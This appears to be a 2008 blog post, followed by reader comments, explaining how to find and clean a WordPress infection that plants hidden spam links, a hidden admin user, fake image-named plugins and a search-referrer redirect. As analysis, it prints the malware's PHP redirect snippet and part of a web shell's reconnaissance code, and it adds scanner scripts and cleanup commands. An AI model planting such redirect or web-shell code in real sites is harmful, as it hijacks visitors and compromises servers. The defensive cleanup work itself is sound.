Wordpress: Wordpress exploit giving backlinks, redirects and headaches but no visitors ;)
Well, this is about a WordPress exploit keyed on the website cookie, which is very complex and, in my opinion, very well made. It is intelligent enough to perform an SQL injection into the blog's database, to create a user that stays invisible in a quick Dashboard->Users check for anyone browsing with JavaScript enabled, to look on the server for directories and files chmoded 777, and to look up and execute files that run with group or root privileges. I don't know the name of the exploit, and I see there are very few articles about it even though a lot of blogs are infected.
I will try to write a little about it and give some advice on how to neutralize it.
What does the exploit do?
First of all, it inserts into the page source links that are invisible to visitors but visible and indexable for search engines, especially Google. In this way they pass PageRank to websites chosen by the attacker. Second, it inserts redirect code for visitors who arrive from search engines or from an RSS reader and have no cookie from the website. An antivirus (Kaspersky in my case) detects this redirect as Trojan-Clicker.HTML.
Symptoms:
Massive loss of traffic and visitors, especially where search engines bring more than 70% of the visitors.
How to identify?
REMEMBER: First of all backup your database.
1. Check the source of the index.php, header.php and footer.php files in your theme folder and look for code that uses base64 encoding or contains if($ser=="1" && sizeof($_COOKIE)==0), like:
<?php
// referrers that trigger the redirect: search engines and big portals
$seref=array("google","msn","live","altavista",
"ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref)
if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
// only visitors without any cookie are sent away; the base64 string decodes to anyresults.net
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit;
}?>
or something like this. Delete the code.
The screenshot also highlights <?php get_header(); ?>. That line is legitimate and must remain intact.
2. Using phpMyAdmin, go into the database, open the wp_users table and check whether there is a user without a name (an empty user_nicename column) created at 0000-00-00 00:00:00 (the user_login may read WordPress). Note down the ID of this user and delete it.
* In this case, the ID is 8.
3. Go to the wp_usermeta table in phpMyAdmin, find the rows whose user_id matches the ID of the user you just deleted, and delete them.
4. In the wp_options table, look at active_plugins and check whether there is a plugin whose path ends in an image extension. They may be _old.giff, _old.pngg, _old.jpeg, _new.php.giff, _old.gif, _old.png, _old.jpg, _new.php.gif.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'
Delete the plugin entry, then go to your blog's Administration Panel -> Dashboard -> Plugins and deactivate and reactivate any plugin so the fake plugin is removed from the database.
Over FTP or SSH, find the path indicated in active_plugins and delete the file from the server.
5. Also in phpMyAdmin, in the wp_options table, find and delete the rows containing rss_f541b3abd05e7962fcab37737f40fad8 and internal_links_cache.
internal_links_cache holds the encoded spam links that appear in the blog and an AdSense ID belonging to the hacker.
6. It is recommended to change your password. If you have more users, change their passwords too or ask them to do so. Replace the files with the original WordPress files! Upgrade to the latest WordPress version if necessary.
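As an added example, not code from the original post, here is the database side of steps 2 to 5 done from a shell with the mysql command-line client instead of phpMyAdmin. It assumes the default wp_ table prefix and a database named wp; the helper names and the sample rows are my own, constructed so the helpers can be exercised without a database.

```shell
#!/bin/sh
# Added example, not part of the original post: the database side of steps
# 2-5 done with the mysql command-line client instead of phpMyAdmin. Assumes
# the default wp_ table prefix and a database named "wp"; the helper names and
# the sample rows below are my own.

# Step 2: locate the hidden user. Feed in the rows of
#   mysql -B -N -e "SELECT ID,user_login,user_nicename,user_registered FROM wp_users" wp
# (-B -N gives tab-separated rows without a header) and get back the ID of
# every user with an empty user_nicename or the zero registration timestamp.
# A user_login of "WordPress" is a further hint but not required.
find_hidden_users() {
    awk -F'\t' '$3 == "" || $4 == "0000-00-00 00:00:00" { print $1 }'
}

# Step 4: active_plugins is a PHP-serialized array of plugin paths, e.g.
#   a:1:{i:0;s:19:"akismet/akismet.php";}
# Feed in the value of
#   mysql -B -N -e "SELECT option_value FROM wp_options WHERE option_name='active_plugins'" wp
# and get back every entry whose file name ends in an image extension or has
# an extra extension after .php. Exit status is 1 when anything was flagged.
flag_fake_plugins() {
    found=0
    for entry in $(grep -o 's:[0-9]*:"[^"]*"' | sed 's/^s:[0-9]*:"//; s/"$//'); do
        case "$entry" in
            *.giff|*.pngg|*.jpgg|*.jpeg|*.gif|*.png|*.jpg|*.php.*)
                echo "$entry"; found=1 ;;
        esac
    done
    return $found
}

# Steps 2, 3 and 5 as SQL, parameterised on the hidden user's ID. Back the
# database up first, review the output, then: cleanup_sql 8 | mysql wp
cleanup_sql() {
    cat <<EOF
DELETE FROM wp_users WHERE ID = $1;
DELETE FROM wp_usermeta WHERE user_id = $1;
DELETE FROM wp_options WHERE option_name IN ('rss_f541b3abd05e7962fcab37737f40fad8', 'internal_links_cache');
EOF
}

# Constructed sample data (not from a real site): a normal admin plus the
# attacker's user, and an active_plugins value with two fake entries next to
# a real one.
SAMPLE_USERS=$(printf '1\tadmin\tadmin\t2007-03-12 10:15:00\n8\tWordPress\t\t0000-00-00 00:00:00\n')
SAMPLE_PLUGINS='a:3:{i:0;s:19:"akismet/akismet.php";i:1;s:26:"hello-dolly/hello_old.giff";i:2;s:19:"foo/bar_new.php.gif";}'

# Dry run on the sample data: sh wpdb-check.sh demo
if [ "${1:-}" = "demo" ]; then
    echo "hidden user IDs:"; printf '%s\n' "$SAMPLE_USERS" | find_hidden_users
    echo "fake plugins:";    printf '%s\n' "$SAMPLE_PLUGINS" | flag_fake_plugins || true
    echo "cleanup SQL:";     cleanup_sql 8
fi
```

The plugin check deliberately parses the serialized value with grep rather than trusting the s:N: length prefixes, because a hand-edited option value may have wrong lengths and still be loaded by WordPress. Deactivating and reactivating a plugin afterwards, as step 4 says, makes WordPress rewrite active_plugins cleanly.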
I have tried to explain what to do in this situation to get rid of the virus, but the problem is not solved yet, because vulnerabilities of the web server hosting the blog are being used as well.
First of all, check whether there are files named *_old* and *_new* on the server with .giff, .jpeg, .pngg or .jpgg extensions. These files must be deleted. (I found some in wp-includes, in the tinyMCE folder, 5 subfolders down, so it is easier if you have SSH access; otherwise back up and download the files to your PC and search for them there.)
Some checking, deleting and securing on the server (via SSH)
1. cd /tmp and check for folders like tmpVFlma or similar combinations and delete them. In the screenshot you can see 2 folders of this kind:
rm -rf foldername
2. Check and, where possible, tighten the permissions of folders and files chmoded 777:
find all writable files in current dir: find . -type f -perm -2 -ls
find all writable directories in current dir: find . -type d -perm -2 -ls
find all writable directories and files in current dir: find . -perm -2 -ls
3. Look for suspicious files on the server:
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*.giff"
find . -name "*.pngg"
4. ATTENTION to files that have the SUID or SGID bit set. These files run with the privileges of their owner or group (often root), not with those of the user who executes them. Such files can compromise root if the server has security problems. If you don't use these kinds of files, chmod 0 them or uninstall the package containing them.
The exploit has in its source:
// execute() is the shell's own helper that runs a system command and returns its output
if(!$safe_mode){
    if($os_type == 'nix'){
        // fingerprint the kernel (BSD and Linux sysctl names) and the current user
        $os .= execute('sysctl -n kern.ostype');
        $os .= execute('sysctl -n kern.osrelease');
        $os .= execute('sysctl -n kernel.ostype');
        $os .= execute('sysctl -n kernel.osrelease');
        if(empty($user)) $user = execute('id');
        // canned reconnaissance commands offered in the shell's menu
        $aliases = array(
            '' => '',
            'find suid files'=>'find / -type f -perm -04000 -ls',
            'find sgid files'=>'find / -type f -perm -02000 -ls',
            'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
            'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
            'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
            'show opened ports'=>'netstat -an | grep -i listen',
        );
    }else{
        // Windows branch
        $os_name .= execute('ver');
        $user .= execute('echo %username%');
        $aliases = array(
            '' => '',
            'show runing services' => 'net start',
            'show process list' => 'tasklist'
        );
    }
}
In this way it finds open ports and writable directories/files, and it can execute files that carry group/root privileges.
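As an added example, not code from the original post or from the exploit, the server-side checks of this section (the *_old/*_new file hunt, the /tmp scratch folders, world-writable paths and SUID/SGID files) plus the theme redirect check from step 1 are collected into one POSIX shell scanner. It assumes a WordPress install under the directory you pass as the first argument; the function names, the scan_all entry point and the demo file layout are my own. The redirect check is limited to the themes directory because WordPress core itself calls base64_decode() legitimately, so treat every path the scanner prints as something to review, not as something to delete blindly.

```shell
#!/bin/sh
# Added example, not part of the original post: one scanner for the checks in
# this section. Every function takes a directory and prints one path per line.
# Function names, the demo layout and the "scan_all" entry point are my own.

# 1. Theme files carrying the referrer/cookie redirect. The two literals that
#    identify it are the empty-cookie test and the base64-encoded destination.
#    Scan wp-content/themes only: WordPress core also calls base64_decode().
scan_redirect_code() {
    find "$1" -type f -name '*.php' \
        -exec grep -lE 'sizeof\(\$_COOKIE\)==0|base64_decode\(' {} +
}

# 2. The fake-plugin / backdoor naming scheme: *_old.* and *_new.* files, the
#    misspelled image extensions (.giff .pngg .jpgg) and anything with ".php."
#    in the middle of the name (x_new.php.gif).
scan_suspect_names() {
    find "$1" -type f \( -name '*_old.*' -o -name '*_new.*' \
        -o -name '*.giff' -o -name '*.pngg' -o -name '*.jpgg' -o -name '*.php.*' \)
}

# 3. Scratch directories the exploit drops (tmpVFlma and the like), by default
#    directly under /tmp. Pass another directory to scan that instead.
scan_tmp_dirs() {
    find "${1:-/tmp}" -mindepth 1 -maxdepth 1 -type d -name 'tmp*'
}

# 4. World-writable files and directories (the chmod 777 targets). Symlinks
#    are always 777 on Linux, so they are skipped.
scan_world_writable() {
    find "$1" ! -type l -perm -2
}

# 5. SUID/SGID files: they run with the owner's or group's privileges, not the
#    caller's, so a writable or vulnerable one is a root-escalation path.
scan_setid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \)
}

# Run everything over a WordPress document root:
#   sh wpscan.sh /var/www/blog [/tmp]
scan_all() {
    root=$1
    echo "== redirect code in themes"; scan_redirect_code "$root/wp-content/themes"
    echo "== suspicious file names";   scan_suspect_names "$root"
    echo "== scratch dirs";            scan_tmp_dirs "${2:-/tmp}"
    echo "== world-writable";          scan_world_writable "$root"
    echo "== SUID/SGID";               scan_setid "$root"
}

if [ "$#" -ge 1 ]; then
    scan_all "$@"
fi
```

Run it as the account that owns the site so it can read everything under the document root; the /tmp and SUID checks are more useful with root, since a SUID binary outside the web root is exactly the kind of thing the exploit's "find suid files" alias is looking for on your behalf.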
Will be back with more.
PS: You can check whether a blog has problems by searching on Google:
site:www.yoursitename buy
Open the cached copy of a result and view its source. You'll be surprised.
Thanks StealthSettings for intro and screenshots ;)


July 4th, 2008 at 2:27 pm
[…] WordPress Exploit Giving Backlinks, Redirects and Headaches, but no Visitors […]
July 5th, 2008 at 5:51 am
I've got something similar going on, and it is SO similar I'd like to say it's the same thing you're describing, but it's also different.
My main index and admin-login index were replaced with an “analytics-google.info” page. I used an ftp tool to find about 3 folders with 2000 websites EACH now pointing to my blog. Making my blog the host of everything from child p-n to back medicine. One folder was called “fun,” one folder was stuck inside an image folder from last year, and a couple more were in theme folders (including the classic theme).
This type of exploit is very bad. Very bad. And I had been doing all the stuff you listed here on my own, but good job putting together a list. And it's a daunting and tiresome set of procedures that each and every blog owner will have to go through. I mean it's WAY too big a problem for Wordpress not to be addressing.
July 5th, 2008 at 6:14 am
I will have to update and say something I surely had to write. After completing the tasks described above, replace the Wordpress files with the original ones. And make the upgrade if necessary.
July 6th, 2008 at 11:09 am
[…] was embedded at the top of the header code. Here's the code you are looking for (thanks to bloggerguide.net): <?php $seref=array("google","msn","live","altavista", […]
July 14th, 2008 at 1:28 am
Too bad I didn't come across this blog before. Great stuff you got here. Thanks.
July 15th, 2008 at 11:30 am
You’re all welcome. I’ll make time for writing more in here.
July 25th, 2008 at 9:29 am
[…] {from bloggerguide.net} {from ocaoimh.ie} […]
July 31st, 2008 at 6:38 am
Don’t forget to delete /tmp/tmp*
July 31st, 2008 at 1:26 pm
[…] Wordpress exploit giving backlinks, redirects and headaches but no visitors […]
August 2nd, 2008 at 9:45 pm
Brilliant!
August 13th, 2008 at 3:46 pm
[…] to read about this nuisance, how to detect it and how to fix the problems, see BloggerGuide and Holy […]